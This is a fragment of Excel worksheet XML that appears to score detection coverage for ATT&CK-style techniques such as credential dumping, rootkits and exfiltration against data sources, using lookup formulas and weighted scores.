      </c>
      <c r="D234" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E234" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F234" s="50"/>
      <c r="G234" s="19"/>
    </row>
    <row r="235" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A235" s="16" t="s">
        <v>363</v>
      </c>
      <c r="B235" s="45" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C235" s="17">
        <v>0</v>
      </c>
      <c r="D235" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E235" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F235" s="50"/>
      <c r="G235" s="19"/>
    </row>
    <row r="236" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A236" s="16" t="s">
        <v>364</v>
      </c>
      <c r="B236" s="45" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C236" s="17">
        <v>0</v>
      </c>
      <c r="D236" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E236" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F236" s="50"/>
      <c r="G236" s="19"/>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A237" s="16" t="s">
        <v>365</v>
      </c>
      <c r="B237" s="45" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C237" s="17">
        <v>0</v>
      </c>
      <c r="D237" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E237" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F237" s="50"/>
      <c r="G237" s="19"/>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A238" s="16" t="s">
        <v>366</v>
      </c>
      <c r="B238" s="45" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C238" s="17">
        <v>0</v>
      </c>
      <c r="D238" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E238" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F238" s="50"/>
      <c r="G238" s="19"/>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A239" s="16" t="s">
        <v>367</v>
      </c>
      <c r="B239" s="45" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C239" s="17">
        <v>0</v>
      </c>
      <c r="D239" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E239" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F239" s="50"/>
      <c r="G239" s="19"/>
    </row>
    <row r="240" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A240" s="16" t="s">
        <v>368</v>
      </c>
      <c r="B240" s="45" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C240" s="17">
        <v>0</v>
      </c>
      <c r="D240" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E240" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F240" s="50"/>
      <c r="G240" s="19"/>
    </row>
    <row r="241" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A241" s="16" t="s">
        <v>370</v>
      </c>
      <c r="B241" s="45" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host forensic analysis,Signature-based detection,Static File Analysis</v>
      </c>
      <c r="C241" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D241" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E241" s="45">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F241" s="50"/>
      <c r="G241" s="19"/>
    </row>
    <row r="242" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A242" s="16" t="s">
        <v>371</v>
      </c>
      <c r="B242" s="45" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C242" s="17">
        <v>0</v>
      </c>
      <c r="D242" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E242" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F242" s="50"/>
      <c r="G242" s="19"/>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A243" s="16" t="s">
        <v>372</v>
      </c>
      <c r="B243" s="45" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C243" s="17">
        <v>0</v>
      </c>
      <c r="D243" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E243" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F243" s="50"/>
      <c r="G243" s="19"/>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A244" s="16" t="s">
        <v>374</v>
      </c>
      <c r="B244" s="45" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C244" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D244" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E244" s="45">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F244" s="50"/>
      <c r="G244" s="19"/>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A245" s="16" t="s">
        <v>375</v>
      </c>
      <c r="B245" s="45" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C245" s="17">
        <v>0</v>
      </c>
      <c r="D245" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E245" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F245" s="50"/>
      <c r="G245" s="19"/>
    </row>
    <row r="246" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A246" s="43" t="s">
        <v>376</v>
      </c>
      <c r="B246" s="45" t="str">
        <f>LOOKUP(A246,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C246" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D246" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E246" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F246" s="50"/>
      <c r="G246" s="19"/>
    </row>
    <row r="247" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A247" s="43" t="s">
        <v>377</v>
      </c>
      <c r="B247" s="45" t="str">
        <f>LOOKUP(A247,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C247" s="17">
        <v>0</v>
      </c>
      <c r="D247" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E247" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F247" s="50"/>
      <c r="G247" s="19"/>
    </row>
    <row r="248" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A248" s="43" t="s">
        <v>378</v>
      </c>
      <c r="B248" s="45" t="str">
        <f>LOOKUP(A248,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C248" s="17">
        <v>0</v>
      </c>
      <c r="D248" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E248" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F248" s="50"/>
      <c r="G248" s="19"/>
    </row>
    <row r="249" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A249" s="43" t="s">
        <v>379</v>
      </c>
      <c r="B249" s="45" t="str">
        <f>LOOKUP(A249,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C249" s="17">
        <v>0</v>
      </c>
      <c r="D249" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E249" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F249" s="50"/>
      <c r="G249" s="19"/>
    </row>
    <row r="250" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A250" s="43" t="s">
        <v>380</v>
      </c>
      <c r="B250" s="45" t="str">
        <f>LOOKUP(A250,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C250" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D250" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E250" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F250" s="50"/>
      <c r="G250" s="19"/>
    </row>
    <row r="251" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A251" s="43" t="s">
        <v>381</v>
      </c>
      <c r="B251" s="45" t="str">
        <f>LOOKUP(A251,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C251" s="17">
        <v>0</v>
      </c>
      <c r="D251" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E251" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F251" s="50"/>
      <c r="G251" s="19"/>
    </row>
    <row r="252" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A252" s="43" t="s">
        <v>382</v>
      </c>
      <c r="B252" s="45" t="str">
        <f>LOOKUP(A252,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C252" s="17">
        <v>0</v>
      </c>
      <c r="D252" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E252" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F252" s="50"/>
      <c r="G252" s="19"/>
    </row>
    <row r="253" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A253" s="43" t="s">
        <v>383</v>
      </c>
      <c r="B253" s="45" t="str">
        <f>LOOKUP(A253,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C253" s="17">
        <v>0</v>
      </c>
      <c r="D253" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E253" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F253" s="50"/>
      <c r="G253" s="19"/>
    </row>
    <row r="254" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A254" s="43" t="s">
        <v>384</v>
      </c>
      <c r="B254" s="45" t="str">
        <f>LOOKUP(A254,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C254" s="17">
        <v>0</v>
      </c>
      <c r="D254" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E254" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F254" s="50"/>
      <c r="G254" s="19"/>
    </row>
    <row r="255" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A255" s="43" t="s">
        <v>385</v>
      </c>
      <c r="B255" s="45" t="str">
        <f>LOOKUP(A255,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C255" s="17">
        <v>0</v>
      </c>
      <c r="D255" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E255" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F255" s="50"/>
      <c r="G255" s="19"/>
    </row>
    <row r="256" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A256" s="43" t="s">
        <v>386</v>
      </c>
      <c r="B256" s="45" t="str">
        <f>LOOKUP(A256,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C256" s="17">
        <v>0</v>
      </c>
      <c r="D256" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E256" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F256" s="50"/>
      <c r="G256" s="19"/>
    </row>
    <row r="257" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A257" s="43" t="s">
        <v>387</v>
      </c>
      <c r="B257" s="45" t="str">
        <f>LOOKUP(A257,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C257" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D257" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E257" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F257" s="50"/>
      <c r="G257" s="19"/>
    </row>
    <row r="258" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A258" s="43" t="s">
        <v>388</v>
      </c>
      <c r="B258" s="45" t="str">
        <f>LOOKUP(A258,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C258" s="17">
        <v>0</v>
      </c>
      <c r="D258" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E258" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F258" s="50"/>
      <c r="G258" s="19"/>
    </row>
    <row r="259" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A259" s="43" t="s">
        <v>389</v>
      </c>
      <c r="B259" s="45" t="str">
        <f>LOOKUP(A259,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C259" s="17">
        <v>0</v>
      </c>
      <c r="D259" s="45">
        <f t="shared" ref="D259:D267" si="9">LEN(TRIM(B259))-LEN(SUBSTITUTE(TRIM(B259),",",""))+1</f>
        <v>1</v>
      </c>
      <c r="E259" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F259" s="50"/>
      <c r="G259" s="19"/>
    </row>
    <row r="260" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A260" s="43" t="s">
        <v>390</v>
      </c>
      <c r="B260" s="45" t="str">
        <f>LOOKUP(A260,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C260" s="17">
        <v>0</v>
      </c>
      <c r="D260" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E260" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F260" s="50"/>
      <c r="G260" s="19"/>
    </row>
    <row r="261" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A261" s="43" t="s">
        <v>391</v>
      </c>
      <c r="B261" s="45" t="str">
        <f>LOOKUP(A261,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C261" s="17">
        <v>0</v>
      </c>
      <c r="D261" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E261" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F261" s="50"/>
      <c r="G261" s="19"/>
    </row>
    <row r="262" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A262" s="43" t="s">
        <v>392</v>
      </c>
      <c r="B262" s="45" t="str">
        <f>LOOKUP(A262,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C262" s="17">
        <v>0</v>
      </c>
      <c r="D262" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E262" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F262" s="50"/>
      <c r="G262" s="19"/>
    </row>
    <row r="263" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A263" s="43" t="s">
        <v>393</v>
      </c>
      <c r="B263" s="45" t="str">
        <f>LOOKUP(A263,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C263" s="17">
        <v>0</v>
      </c>
      <c r="D263" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E263" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F263" s="50"/>
      <c r="G263" s="19"/>
    </row>
    <row r="264" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A264" s="43" t="s">
        <v>394</v>
      </c>
      <c r="B264" s="45" t="str">
        <f>LOOKUP(A264,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C264" s="17">
        <v>0</v>
      </c>
      <c r="D264" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E264" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F264" s="50"/>
      <c r="G264" s="19"/>
    </row>
    <row r="265" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A265" s="43" t="s">
        <v>396</v>
      </c>
      <c r="B265" s="45" t="str">
        <f>LOOKUP(A265,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C265" s="17">
        <v>0</v>
      </c>
      <c r="D265" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E265" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F265" s="50"/>
      <c r="G265" s="19"/>
    </row>
    <row r="266" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A266" s="43" t="s">
        <v>397</v>
      </c>
      <c r="B266" s="45" t="str">
        <f>LOOKUP(A266,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C266" s="17">
        <v>0</v>
      </c>
      <c r="D266" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E266" s="45">
        <f t="shared" ref="E266:E267" si="10">LEN(TRIM(C266))-LEN(SUBSTITUTE(TRIM(C266),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F266" s="50"/>
      <c r="G266" s="19"/>
    </row>
    <row r="267" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A267" s="43" t="s">
        <v>399</v>
      </c>
      <c r="B267" s="45" t="str">
        <f>LOOKUP(A267,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C267" s="17">
        <v>0</v>
      </c>
      <c r="D267" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E267" s="45">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="F267" s="50"/>
      <c r="G267" s="19"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="G2">
    <cfRule type="iconSet" priority="1">
      <iconSet iconSet="3Symbols2" reverse="1">
        <cfvo type="percent" val="0"/>
        <cfvo type="num" val="0" gte="0"/>
        <cfvo type="num" val="0" gte="0"/>
      </iconSet>
    </cfRule>
  </conditionalFormatting>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A42E9-E42C-4496-BDC3-EB50FDD46582}">
  <dimension ref="A1:Z431"/>
  <sheetViews>
    <sheetView zoomScale="150" zoomScaleNormal="150" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A236" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="C246" sqref="C246:C1048576"/>
      <selection pane="bottomLeft" activeCell="E267" sqref="E267"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="9.5" customWidth="1"/>
    <col min="2" max="2" width="39.5" customWidth="1"/>
    <col min="3" max="3" width="65.33203125" customWidth="1"/>
    <col min="4" max="6" width="20.6640625" style="2" customWidth="1"/>
    <col min="7" max="7" width="32.5" style="1" customWidth="1"/>
    <col min="8" max="26" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="42" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="42" t="s">
        <v>406</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>407</v>
      </c>
      <c r="D1" s="52" t="s">
        <v>408</v>
      </c>
      <c r="E1" s="44" t="s">
        <v>409</v>
      </c>
      <c r="F1" s="44" t="s">
        <v>410</v>
      </c>
      <c r="G1" s="31" t="s">
        <v>5</v>
      </c>
      <c r="H1" s="42"/>
    </row>
    <row r="2" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A2" s="43" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="41" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:B)</f>
        <v>Data Obfuscation</v>
      </c>
      <c r="C2" s="45" t="s">
        <v>534</v>
      </c>
      <c r="D2" s="14">
        <v>3</v>
      </c>
      <c r="E2" s="14">
        <v>3</v>
      </c>
      <c r="F2" s="14">
        <v>4</v>
      </c>
      <c r="G2" s="32">
        <f>((D2*2)+(E2*2)+F2)/5</f>
        <v>3.2</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3" s="43" t="s">
        <v>46</v>
      </c>
      <c r="B3" s="41" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:B)</f>
        <v>Protocol Impersonation</v>
      </c>
      <c r="C3" s="45" t="s">
        <v>3029</v>
      </c>
      <c r="D3" s="14">
        <v>3</v>
      </c>
      <c r="E3" s="14">
        <v>4</v>
      </c>
      <c r="F3" s="14">
        <v>4</v>
      </c>
      <c r="G3" s="32">
        <f t="shared" ref="G3:G66" si="0">((D3*2)+(E3*2)+F3)/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A4" s="43" t="s">
        <v>48</v>
      </c>
      <c r="B4" s="41" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:B)</f>
        <v>OS Credential Dumping</v>
      </c>
      <c r="C4" s="45" t="s">
        <v>552</v>
      </c>
      <c r="D4" s="14">
        <v>4</v>
      </c>
      <c r="E4" s="14">
        <v>4</v>
      </c>
      <c r="F4" s="14">
        <v>4</v>
      </c>
      <c r="G4" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A5" s="43" t="s">
        <v>49</v>
      </c>
      <c r="B5" s="41" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:B)</f>
        <v>/etc/passwd and /etc/shadow</v>
      </c>
      <c r="C5" s="45" t="s">
        <v>2029</v>
      </c>
      <c r="D5" s="14">
        <v>4</v>
      </c>
      <c r="E5" s="14">
        <v>5</v>
      </c>
      <c r="F5" s="14">
        <v>5</v>
      </c>
      <c r="G5" s="32">
        <f t="shared" si="0"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A6" s="43" t="s">
        <v>51</v>
      </c>
      <c r="B6" s="41" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:B)</f>
        <v>Data from Local System</v>
      </c>
      <c r="C6" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D6" s="14">
        <v>2</v>
      </c>
      <c r="E6" s="14">
        <v>4</v>
      </c>
      <c r="F6" s="14">
        <v>4</v>
      </c>
      <c r="G6" s="32">
        <f t="shared" si="0"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A7" s="43" t="s">
        <v>53</v>
      </c>
      <c r="B7" s="41" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:B)</f>
        <v>Direct Volume Access</v>
      </c>
      <c r="C7" s="45" t="s">
        <v>603</v>
      </c>
      <c r="D7" s="14">
        <v>0</v>
      </c>
      <c r="E7" s="14">
        <v>0</v>
      </c>
      <c r="F7" s="14">
        <v>1</v>
      </c>
      <c r="G7" s="32">
        <f t="shared" si="0"/>
        <v>0.2</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A8" s="43" t="s">
        <v>54</v>
      </c>
      <c r="B8" s="41" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:B)</f>
        <v>System Service Discovery</v>
      </c>
      <c r="C8" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D8" s="14">
        <v>4</v>
      </c>
      <c r="E8" s="14">
        <v>5</v>
      </c>
      <c r="F8" s="14">
        <v>5</v>
      </c>
      <c r="G8" s="32">
        <f t="shared" si="0"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A9" s="43" t="s">
        <v>56</v>
      </c>
      <c r="B9" s="41" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:B)</f>
        <v>Fallback Channels</v>
      </c>
      <c r="C9" s="45" t="s">
        <v>614</v>
      </c>
      <c r="D9" s="14">
        <v>2</v>
      </c>
      <c r="E9" s="14">
        <v>3</v>
      </c>
      <c r="F9" s="14">
        <v>4</v>
      </c>
      <c r="G9" s="32">
        <f t="shared" si="0"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A10" s="43" t="s">
        <v>58</v>
      </c>
      <c r="B10" s="41" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:B)</f>
        <v>Fallback Channels</v>
      </c>
      <c r="C10" s="45" t="s">
        <v>3030</v>
      </c>
      <c r="D10" s="14">
        <v>1</v>
      </c>
      <c r="E10" s="14">
        <v>3</v>
      </c>
      <c r="F10" s="14">
        <v>4</v>
      </c>
      <c r="G10" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A11" s="43" t="s">
        <v>60</v>
      </c>
      <c r="B11" s="41" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:B)</f>
        <v>Application Window Discovery</v>
      </c>
      <c r="C11" s="45" t="s">
        <v>617</v>
      </c>
      <c r="D11" s="14">
        <v>1</v>
      </c>
      <c r="E11" s="14">
        <v>2</v>
      </c>
      <c r="F11" s="14">
        <v>2</v>
      </c>
      <c r="G11" s="32">
        <f t="shared" si="0"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A12" s="43" t="s">
        <v>62</v>
      </c>
      <c r="B12" s="41" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
      <c r="C12" s="45" t="s">
        <v>622</v>
      </c>
      <c r="D12" s="14">
        <v>1</v>
      </c>
      <c r="E12" s="14">
        <v>2</v>
      </c>
      <c r="F12" s="14">
        <v>3</v>
      </c>
      <c r="G12" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A13" s="43" t="s">
        <v>64</v>
      </c>
      <c r="B13" s="41" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:B)</f>
        <v>Query Registry</v>
      </c>
      <c r="C13" s="45" t="s">
        <v>631</v>
      </c>
      <c r="D13" s="14">
        <v>4</v>
      </c>
      <c r="E13" s="14">
        <v>4</v>
      </c>
      <c r="F13" s="14">
        <v>4</v>
      </c>
      <c r="G13" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A14" s="43" t="s">
        <v>66</v>
      </c>
      <c r="B14" s="41" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:B)</f>
        <v>Query Registry</v>
      </c>
      <c r="C14" s="45" t="s">
        <v>2055</v>
      </c>
      <c r="D14" s="14">
        <v>1</v>
      </c>
      <c r="E14" s="14">
        <v>3</v>
      </c>
      <c r="F14" s="14">
        <v>4</v>
      </c>
      <c r="G14" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="15" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A15" s="43" t="s">
        <v>68</v>
      </c>
      <c r="B15" s="41" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:B)</f>
        <v>Rootkit</v>
      </c>
      <c r="C15" s="45" t="s">
        <v>635</v>
      </c>
      <c r="D15" s="14">
        <v>0</v>
      </c>
      <c r="E15" s="14">
        <v>1</v>
      </c>
      <c r="F15" s="14">
        <v>4</v>
      </c>
      <c r="G15" s="32">
        <f t="shared" si="0"/>
        <v>1.2</v>
      </c>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A16" s="43" t="s">
        <v>70</v>
      </c>
      <c r="B16" s="41" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:B)</f>
        <v>Rootkit</v>
      </c>
      <c r="C16" s="45" t="s">
        <v>2029</v>
      </c>
      <c r="D16" s="14">
        <v>3</v>
      </c>
      <c r="E16" s="14">
        <v>4</v>
      </c>
      <c r="F16" s="14">
        <v>4</v>
      </c>
      <c r="G16" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A17" s="43" t="s">
        <v>72</v>
      </c>
      <c r="B17" s="41" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:B)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="C17" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D17" s="14">
        <v>3</v>
      </c>
      <c r="E17" s="14">
        <v>4</v>
      </c>
      <c r="F17" s="14">
        <v>4</v>
      </c>
      <c r="G17" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A18" s="43" t="s">
        <v>73</v>
      </c>
      <c r="B18" s="41" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:B)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="C18" s="45" t="s">
        <v>3031</v>
      </c>
      <c r="D18" s="14">
        <v>2</v>
      </c>
      <c r="E18" s="14">
        <v>4</v>
      </c>
      <c r="F18" s="14">
        <v>4</v>
      </c>
      <c r="G18" s="32">
        <f t="shared" si="0"/>
